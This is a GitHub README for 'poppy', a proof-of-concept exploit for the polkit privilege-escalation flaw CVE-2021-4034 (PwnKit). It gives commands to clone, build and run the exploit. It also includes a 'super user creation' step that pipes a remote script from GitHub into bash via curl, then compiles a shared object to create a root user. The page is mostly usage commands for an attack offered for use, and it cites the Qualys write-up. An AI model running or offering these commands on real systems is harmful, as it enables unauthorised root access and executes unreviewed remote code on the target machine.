Skip to content

Latest commit

 

History

History
28 lines (20 loc) · 647 Bytes

README.md

File metadata and controls

28 lines (20 loc) · 647 Bytes

poppy : CVE-2021-4034

CVE-2021-4034 PoC , polkit < 0.131

Usage

Tested on Arch Linux (Manjaro & Axyl OS)

git clone https://github.com/tahaafarooq/poppy
make
./poppy

Super user creation exploit

bash -c "$(curl -fsSL https://raw.githubusercontent.com/tahaafarooq/poppy/main/suuser.sh)"
gcc -shared su.c -o suuser -Wl,-e,entry -fPIC
./suuser

POC

anotherone

For more information about this vulnerability refer to the writeup https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt